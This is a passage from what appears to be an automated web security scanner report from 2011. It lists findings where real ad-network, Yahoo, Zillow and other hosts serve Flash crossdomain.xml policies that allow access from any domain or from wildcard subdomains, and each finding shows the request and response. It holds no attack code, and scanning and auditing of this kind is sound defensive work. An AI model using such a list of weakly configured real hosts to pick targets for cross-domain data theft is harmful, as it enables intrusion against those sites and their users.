Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 07 Sep 2011 12:45:29 GMT
Content-Type: text/xml
Content-Length: 207
Date: Tue, 06 Sep 2011 12:45:29 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

3.43. http://presence.apizone.betaregion.oberon-media.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://presence.apizone.betaregion.oberon-media.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: presence.apizone.betaregion.oberon-media.com

Response

HTTP/1.0 200 OK
Content-Length: 208
Content-Type: text/xml
Last-Modified: Thu, 15 Mar 2007 15:40:00 GMT
Accept-Ranges: bytes
ETag: "0c8dc301867c71:8f0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:46:01 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

3.44. http://query.yahooapis.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://query.yahooapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: query.yahooapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Date: Tue, 06 Sep 2011 12:45:27 GMT
Server: YTS/1.19.8
Age: 1

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-policy>

3.45. http://r.casalemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.casalemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:27:27 GMT
ETag: "15690dc-e6-1230c1c0"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Tue, 06 Sep 2011 11:59:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 11:59:03 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Casale Media -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.46. http://redirect.rtrk.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://redirect.rtrk.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: redirect.rtrk.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:05 GMT
Server: Apache
Last-Modified: Fri, 05 Mar 2010 01:28:54 GMT
ETag: "cc-48103a373c180"
Accept-Ranges: bytes
Content-Length: 204
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Keep-Alive: timeout=12, max=84
Connection: Keep-Alive
Content-Type: application/xml
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7f45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:16:57 GMT;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.47. http://s0.2mdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 05 Sep 2011 23:53:42 GMT
Expires: Sat, 03 Sep 2011 23:42:21 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 45371
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.48. http://segment-pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 06 Sep 2011 12:24:24 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

3.49. http://sensor2.suitesmart.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sensor2.suitesmart.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:50 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 18 Feb 2011 18:15:01 GMT
ETag: "1f00e1-c9-49c927e105340"
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

3.50. http://serviceo.comcast.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://serviceo.comcast.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: serviceo.comcast.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:41 GMT
Server: Omniture DC/2.0.0
xserver: www380
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

3.51. http://spe.atdmt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 207
Allow: GET
Expires: Sat, 10 Sep 2011 00:34:44 GMT
Date: Tue, 06 Sep 2011 12:45:03 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

3.52. http://speed.pointroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:527"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:45:14 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

3.53. http://t.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 06 Sep 2011 12:44:57 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

3.54. http://t.pointroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Wed, 29 Dec 2010 22:37:57 GMT
Accept-Ranges: bytes
ETag: "ef855aa9a7cb1:56f"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 06 Sep 2011 12:49:34 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

3.55. http://tags.bluekai.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:44:59 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 21:44:06 GMT
ETag: "1d83ce-ca-4a6e0af03f580"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

3.56. http://utdi.reachlocal.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: utdi.reachlocal.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:03 GMT
Server: Apache
Last-Modified: Fri, 05 Mar 2010 01:28:54 GMT
ETag: "cc-48103a373c180"
Accept-Ranges: bytes
Content-Length: 204
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Keep-Alive: timeout=12, max=87
Connection: Keep-Alive
Content-Type: application/xml
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7e45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:16:56 GMT;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.57. http://utdi.reachlocal.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: utdi.reachlocal.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:07 GMT
Server: Apache
Last-Modified: Sat, 09 May 2009 00:14:34 GMT
ETag: "cc-4696fa1390e80"
Accept-Ranges: bytes
Content-Length: 204
Keep-Alive: timeout=12, max=91
Connection: Keep-Alive
Content-Type: application/xml
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:00 GMT;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.58. http://whitefence.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://whitefence.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: whitefence.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:03 GMT
Server: Omniture DC/2.0.0
xserver: www186
Content-Length: 137
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

3.59. http://www.burstnet.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.burstnet.com

Response

HTTP/1.0 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Last-Modified: Tue, 30 Aug 2011 18:10:17 GMT
ETag: "596a1b-66-4e5d2789"
Accept-Ranges: bytes
Content-Length: 102
Content-Type: text/xml
Date: Tue, 06 Sep 2011 12:55:53 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.60. http://www.myfitv.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.myfitv.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Tue, 06 Sep 2011 12:29:51 GMT
ETag: "90edc-c6-4a32088aa8480"
Last-Modified: Fri, 13 May 2011 04:13:54 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Vary: Accept-Encoding
Content-Length: 198
Connection: Close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.61. http://www.zillow.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zillow.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zillow.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:19 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.3SP1 (build: CVSTag=JBoss_4_0_3_SP1 date=200510231054)/Tomcat-5.5
Cache-Control: max-age=1209600
Expires: Tue, 20 Sep 2011 12:45:19 GMT
ETag: W/"294-1314817478000"
Last-Modified: Wed, 31 Aug 2011 19:04:38 GMT
Content-Type: text/xml
Content-Length: 294
Via: 1.0 www.zillow.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=15, max=451
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<!-- http://www.foo.com/crossdomain.xml -->
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.62. http://www2.whitefence.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www2.whitefence.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www2.whitefence.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:02:31 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 12:02:31 GMT
Last-Modified: Thu, 25 Sep 2008 22:17:43 GMT
ETag: "c888d-c9-48dc0e07"
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

3.63. http://yql.yahooapis.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://yql.yahooapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: yql.yahooapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Date: Tue, 06 Sep 2011 12:45:06 GMT
Server: YTS/1.19.8
Age: 0

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-policy>

3.64. http://a.adready.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://a.adready.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.adready.com

Response

HTTP/1.0 200 OK
Status: 200 OK
Last-Modified: Thu, 27 Jan 2011 18:42:13 GMT
Content-Type: application/xml
Date: Tue, 06 Sep 2011 12:45:38 GMT
Content-Length: 367
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="maste
...[SNIP]...
<allow-access-from domain="*.adready.com" />
<allow-access-from domain="adready.com" />
<allow-access-from domain="*.local" />
...[SNIP]...

3.65. http://ads.bridgetrack.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.bridgetrack.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 541
Content-Type: text/html
Date: Tue, 06 Sep 2011 11:58:42 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="ads.bridgetrack.com.edgesuite.net" />
   <allow-access-from domain="ads.bri
...[SNIP]...
<allow-access-from domain="sec-ads.bridgetrack.com" />
   <allow-access-from domain="cms-ads.bridgetrack.com" />
   <allow-access-from domain="sec-cms-ads.bridgetrack.com" />
<allow-access-from domain="*.spongecell.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.myvolvo.com.au" secure="false" />
...[SNIP]...

3.66. http://espanol.vonage.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://espanol.vonage.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: espanol.vonage.com

Response

HTTP/1.1 200 OK
Content-Length: 538
Content-Type: text/xml
Last-Modified: Tue, 01 Jun 2010 15:31:08 GMT
Accept-Ranges: bytes
ETag: "9bd62f759f1cb1:3746"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 11:50:15 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="convertlanguage.com"/>
<allow-access-from domain="*.convertlanguage.com"/>
<allow-access-from domain="espanol.support.vonage.com"/>
...[SNIP]...
<allow-access-from domain="*.vonage.com"/>
...[SNIP]...
<allow-access-from domain="speedtest.vonage.com"/>
...[SNIP]...
<allow-access-from domain="support.vonage.com"/>
...[SNIP]...

3.67. http://finance.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: finance.yahoo.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:44:55 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 05 Jun 2008 01:38:47 GMT
Accept-Ranges: bytes
Content-Length: 161
Vary: Accept-Encoding
Content-Type: application/xml
Age: 0
Server: YTS/1.20.7

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="us.js2.yimg.com" />
</cross-domain-policy>

3.68. http://frontier.my.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://frontier.my.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: frontier.my.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

3.69. http://geo.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://geo.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: geo.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:52 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

3.70. http://gws.maps.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://gws.maps.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: gws.maps.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:52 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Yahoo-Serving-Host: gws26.maps.sp1.yahoo.com
Last-Modified: Sat, 05 Dec 2009 08:01:33 GMT
Accept-Ranges: bytes
Content-Length: 469
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*.yimg.com" />
   <allow-access-from domain="*.maps.yahoo.com" />
   <allow-access-from domain="*.corp.yahoo.com" />
   <allow-access-from domain="*.ds.corp.yahoo.com" />
   <allow-access-from domain="*.yahoo.com" />
...[SNIP]...

3.71. http://maps.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://maps.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

